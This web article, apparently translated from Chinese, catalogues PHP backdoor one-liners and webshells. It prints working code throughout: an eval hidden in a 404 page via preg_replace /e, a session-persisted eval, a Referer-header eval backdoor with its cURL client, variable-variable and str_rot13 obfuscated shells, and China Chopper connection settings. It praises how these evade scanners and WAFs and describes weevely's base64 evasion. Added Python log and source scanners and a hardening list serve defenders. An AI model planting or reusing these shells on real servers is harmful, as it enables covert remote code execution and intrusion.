Let's talk about the powerful PHP backdoor trojan

Source: Internet
Author: User
We approach these PHP backdoors with a learning attitude: many of them show how much effort their authors put in. Backdoors of this kind are a headache for website and server administrators, who often need several different detection methods, because many of the newer writing techniques are not caught by the common ones. Today we detail some interesting PHP one-line trojans.

Hiding a PHP one-liner in the 404 page

<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
// The /e modifier makes preg_replace() evaluate the replacement as PHP code.
// "saft" contains an "a", so the character class matches and $_POST['error'] runs.
@preg_replace("/[pageerror]/e", $_POST['error'], "saft");
header('HTTP/1.1 404 Not Found');
?>


Every site has a 404 page, and it is the kind of file almost nobody inspects or modifies, which makes it a convenient place to hide a backdoor. Note that the /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this sample only works on older interpreters.

A PHP one-liner with no signature

<?php
session_start();
// First request: store the POSTed code in the session.
$_POST['code'] && $_SESSION['thecode'] = trim($_POST['code']);
// Every later request: run it from the session, no POST body needed.
// The pattern '\'a\'eis' uses ' as the PCRE delimiter; the e modifier evaluates the replacement.
$_SESSION['thecode'] && preg_replace('\'a\'eis', 'e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'thecode\']))', 'a');
?>

The content of $_POST['code'] is stored in $_SESSION['thecode'] and then executed from the session, so after the first request the code runs on every visit without any payload in the request at all. The selling point is that there is no signature: eval is assembled from single characters, and a keyword-based scanner raises no alarm on this code. In practice, a preg_replace() whose pattern carries the e modifier is itself a strong indicator and is worth a rule of its own.

A super-hidden PHP backdoor

Here parameter a names the function to call and parameter b is its argument. The request that drives it looks like this (the URL is truncated here):

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waH

After the request is executed, a one-line trojan c.php appears in the current directory. Setting parameter a to eval produces an error, because eval is a language construct, not a function that can be called by name; setting it to assert works, because assert() accepted a string and evaluated it as PHP code (PHP 5 and 7.0). The b parameter wraps fputs(fopen(...), ...) in ${...}, PHP's variable-variable syntax, so the fopen/fputs call runs as a side effect while assert() evaluates the string, with the base64 arguments supplying the file name and its contents. This is how a plain one-liner is extended into a dropper.

Layered requests: running code through a PHP backdoor via the Referer

This method uses two files. File 1:

<?php
// 1.php
header('Content-Type: text/html; charset=UTF-8');
// Parse the Referer header as if it were a query string.
parse_str($_SERVER['HTTP_REFERER'], $a);
// Only act on the agreed layout: first value 10, exactly nine parameters.
if (reset($a) == '10' && count($a) == 9) {
    // Parameters g, h, i hold the base64 payload; parse_str turned '+' into ' ', so undo that.
    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}


File 2:

<?php
// 2.php
header('Content-Type: text/html; charset=UTF-8');
// Code to be executed on the target (the body of the heredoc is not preserved on this page)
$code = <<<CODE
// PHP code to execute goes here
CODE;
// Base64-encode it
$code = base64_encode($code);
// Construct the referer string: nine parameters, the first equal to 10
$referer = "a=10&b=AB&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
// Backdoor URL
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer,
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);


The HTTP Referer header of the request carries the base64-encoded code, and the backdoor runs it. WAFs generally inspect the Referer loosely or not at all, so this is a good way of bypassing them: the request body and query string stay empty.
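Detecting this on the defender's side means looking at the one header the WAF ignores. What follows is an added example, not code from the original article: it walks constructed Apache combined-format access-log lines, base64-decodes every Referer parameter after restoring the '+' characters that query-string parsing turns into spaces (the same reversal 1.php does with str_replace), and flags values that decode to PHP code. The log lines, addresses and payloads are all constructed for the example.

```python
"""Spot base64-encoded PHP carried in the Referer header of web-server logs.

Added example for this article, not code from the original page. Assumes the
Apache "combined" log format; every log line below is constructed.
"""
import base64
import binascii
import re
from urllib.parse import parse_qsl

# Constructed log lines (not real traffic). Line 3 uses the bare nine-parameter
# Referer from 2.php; line 4 hides the same layout behind a real-looking URL.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /test1/1.php HTTP/1.1" 200 312 '
    '"https://example.org/page?id=5&q=hello+world" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php HTTP/1.1" 200 9812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /test1/1.php HTTP/1.1" 200 0 '
    '"a=10&b=AB&c=34&d=re&e=32&f=km&g=cGhwaW5mbygpOw==&h=&i=" "curl/7.88.1"',
    '198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /test1/1.php HTTP/1.1" 200 0 '
    '"http://localhost/?a=10&b=AB&c=34&d=re&e=32&f=km&g=c3lzdGVtKCdpZCcpOw==&h=&i=" "curl/7.88.1"',
]

_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Substrings that make decoded text look like PHP rather than random bytes.
PHP_MARKERS = ("<?php", "eval(", "assert(", "system(", "exec(", "passthru(",
               "phpinfo(", "$_POST", "$_GET", "base64_decode(", "fopen(")


def decode_php_payload(value):
    """Return the decoded text if value is base64 of PHP-looking code, else None."""
    # parse_qsl turned '+' into ' '; put it back, as 1.php's str_replace(" ", "+", ...) does
    candidate = value.replace(" ", "+")
    if len(candidate) < 8:
        return None
    try:
        text = base64.b64decode(candidate, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None
    return text if any(marker in text for marker in PHP_MARKERS) else None


def referer_params(referer):
    """Key/value pairs from a Referer, whether or not it is a real URL."""
    query = referer.split("?", 1)[1] if "?" in referer else referer
    return parse_qsl(query, keep_blank_values=True)


def find_referer_backdoor_traffic(lines):
    """Return one hit per log line whose Referer parameters decode to PHP code."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = _COMBINED.match(line)
        if not m or m.group("referer") == "-":
            continue
        referer = m.group("referer")
        for key, value in referer_params(referer):
            code = decode_php_payload(value)
            if code is not None:
                hits.append({
                    "line": number, "ip": m.group("ip"), "param": key, "code": code,
                    # a Referer that is not even a URL is a second, cheaper tell
                    "bare_referer": not referer.startswith(("http://", "https://")),
                })
    return hits


if __name__ == "__main__":
    for hit in find_referer_backdoor_traffic(LOG_LINES):
        print(hit)
```

The same decode step can run inline in a WAF or reverse proxy on the live Referer header; in a log pipeline it is cheap enough to apply to every request, and combining it with the "Referer is not a URL" signal keeps false positives low.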

PHP webshell generation tool: weevely

Weevely is a free PHP webshell tool that gives you a telnet-like interactive shell over the web. It is usually used after exploiting a web application to leave a hidden backdoor and to manage the host from a terminal instead of through a web page. The server-side PHP that weevely generates is base64-encoded, which is enough to fool mainstream anti-virus and IDS rules that look for the literal function names. After uploading the server-side code, you normally connect to it directly with the weevely client.

The backdoor weevely generates relies on the common base64 encoding and string-mangling techniques. Every function that appears in the file is an ordinary string-handling function; eval, system and the other names that detection rules key on never appear literally, so the file slips past webshell search tools. Scanning it with the 暗组 (Darkgroup) webshell scanner reports no threats. Bear in mind that base64 is an encoding, not encryption: the evasion works only against tools that match literal keywords without decoding first.

That is the rough introduction; a short description of its use follows.


Three distorted PHP trojans

First:

In China Chopper (菜刀), connect to 1.php?2=assert with password 1.

Second:

<?php
// The quoted strings on the right-hand side contain non-printable bytes
// that did not survive in this copy of the article.
$_="";
$_[+""]='';           // assigning to an offset of "" turns $_ into an array (PHP < 7.1)
$_="$_"."";           // "Array": its first character is "A"
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");   // "A" OR/XOR hidden bytes spells "GET"
?>
<?php
// i.e. $_GET['_']($_GET['__'])
${'_'.$_}['_'](${'_'.$_}['__']);
?>


In China Chopper, use the URL 2.php?_=assert&__=eval($_POST['pass']) with password pass. Because the real payload is submitted by POST, appending the data in China Chopper (or in another injection tool that posts) is more concealed than putting it in the URL.

Third:

<?php
// str_rot13('riny') is 'eval'; the /e modifier evaluates '@eval($b4dboy)' as PHP code.
($b4dboy = $_POST['b4dboys']) && @preg_replace('/ad/e', '@'.str_rot13('riny').'($b4dboy)', 'add');
?>


str_rot13('riny') is eval in encoded form. It avoids the keyword completely without losing any effect, which is infuriating for anyone writing detection rules.
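A scanner that matches the literal words eval or system misses every sample above. The following is an added example, not code from the original article, of the normalisation a detector needs before it matches keywords: it joins concatenated string literals ('e'.'v'.'a'.'l'), resolves str_rot13('...') literals, parses the first argument of preg_replace() to check for the e modifier, and flags functions called through a superglobal or a ${...} variable-variable, which covers the 404, session, ?a=assert, ${'_'.$_} and str_rot13 samples. The input samples are constructed from the snippets in this article; the $_GET['a']($_GET['b']) one is the shape implied by the ?a=assert&b=... URL and is not code from the page, and the non-printable bytes of the ${'_'.$_} sample are not reconstructed.

```python
"""Static triage of PHP one-liners that hide eval/assert behind string tricks.

Added example for this article, not code from the original page. It normalises
the obfuscations shown above and reports what each sample really does.
"""
import codecs
import re

DANGEROUS = ("eval", "assert", "system", "passthru", "shell_exec", "exec",
             "popen", "proc_open", "create_function")

# Constructed samples based on the article's snippets. The non-printable bytes
# of the ${'_'.$_} sample are NOT restored; $_GET['a']($_GET['b']) is the shape
# implied by the ?a=assert&b=... request, not code taken from the page.
SAMPLES = {
    "404": r"""<?php
@preg_replace("/[pageerror]/e", $_POST['error'], "saft");
header('HTTP/1.1 404 Not Found');
?>""",
    "session": r"""<?php
session_start();
$_POST['code'] && $_SESSION['thecode'] = trim($_POST['code']);
$_SESSION['thecode'] && preg_replace('\'a\'eis', 'e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'thecode\']))', 'a');
?>""",
    "rot13": r"""<?php ($b4dboy = $_POST['b4dboys']) && @preg_replace('/ad/e', '@'.str_rot13('riny').'($b4dboy)', 'add'); ?>""",
    "referer": r"""<?php
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '10' && count($a) == 9) {
    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}""",
    "dynamic_call": r"""<?php $_GET['a']($_GET['b']); ?>""",
    "variable_variable": r"""<?php $_=""; $_[+""]=''; $_="$_".""; ${'_'.$_}['_'](${'_'.$_}['__']); ?>""",
    "benign": r"""<?php echo htmlspecialchars($_GET['q']); ?>""",
}

# 'a' . 'b' -> 'ab' (either quote style, escaped quotes allowed inside)
_CONCAT = re.compile(r"""(['"])((?:\\.|(?!\1).)*)\1\s*\.\s*(['"])((?:\\.|(?!\3).)*)\3""")
_ROT13 = re.compile(r"""str_rot13\s*\(\s*(['"])((?:\\.|(?!\1).)*)\1\s*\)""")
# preg_replace(<pattern literal>, <replacement up to the next comma>
_PREG = re.compile(r"""preg_replace\s*\(\s*(['"])((?:\\.|(?!\1).)*)\1\s*,\s*([^,]*)""")
_REQUEST = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|SESSION)")
# $_GET['x'](...) or ${...}['x'](...): the function name comes from the request
_DYN_CALL = re.compile(r"""(?:\$_(?:GET|POST|REQUEST|COOKIE|SESSION|SERVER)|\$\{[^}]*\})\s*\[[^\]]*\]\s*\(""")
_REFERER = re.compile(r"""parse_str\s*\(\s*\$_SERVER\s*\[\s*['"]HTTP_REFERER""")
_DANGER = re.compile(r"""(?<![\w$])(%s)\s*\(""" % "|".join(DANGEROUS))


def normalize(src):
    """Undo the cheap string tricks so the real call names become visible."""
    src = _ROT13.sub(lambda m: m.group(1) + codecs.decode(m.group(2), "rot_13") + m.group(1), src)
    while True:
        joined = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), src)
        if joined == src:
            return src
        src = joined


def scan(src):
    """Return sorted finding tags for one PHP source text."""
    findings = set()
    clean = normalize(src)
    for m in _PREG.finditer(clean):
        pat = m.group(2).replace("\\'", "'").replace('\\"', '"')
        if not pat:
            continue
        # first char is the PCRE delimiter; modifiers follow its closing twin
        close = {"(": ")", "[": "]", "{": "}", "<": ">"}.get(pat[0], pat[0])
        end = pat.rfind(close)
        if end > 0 and "e" in pat[end + 1:]:
            findings.add("preg_replace:/e")
            if _REQUEST.search(m.group(3)):
                findings.add("preg_replace:/e-replacement-from-request")
    if _DYN_CALL.search(clean):
        findings.add("dynamic-call:request-controlled-function")
    if _REFERER.search(clean):
        findings.add("referer:parse_str")
    for m in _DANGER.finditer(clean):
        findings.add("call:" + m.group(1))
    return sorted(findings)


def scan_samples():
    return {name: scan(src) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, tags in scan_samples().items():
        print(f"{name:18} {', '.join(tags) or 'clean'}")
```

The normalisation is deliberately shallow (string literals only, no PHP parser), which is enough for the samples here; a production scanner would add base64 literal decoding for weevely-style files and track data flow from the superglobals into the calls it flags.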

How to deal with PHP webshells

A few key points, briefly; anyone reading this article is presumably no layman, so I will not belabour them:

1. Write PHP with security in mind.
2. Read the server log files often, and back them up often.
3. Assign permissions strictly, per site.
4. Review dynamic files and directories in batches, regularly.
5. Learn to do manual "behaviour-based" detection and removal.
6. Keep up with, or take part in, the active security communities.
7. Harden the server environment in layers; even a single PHP function can be the basis of a rule.
Tags: php, php backdoor, php trojan

Original article: Let's talk about the powerful PHP backdoor Trojan. Thanks to the author for sharing.
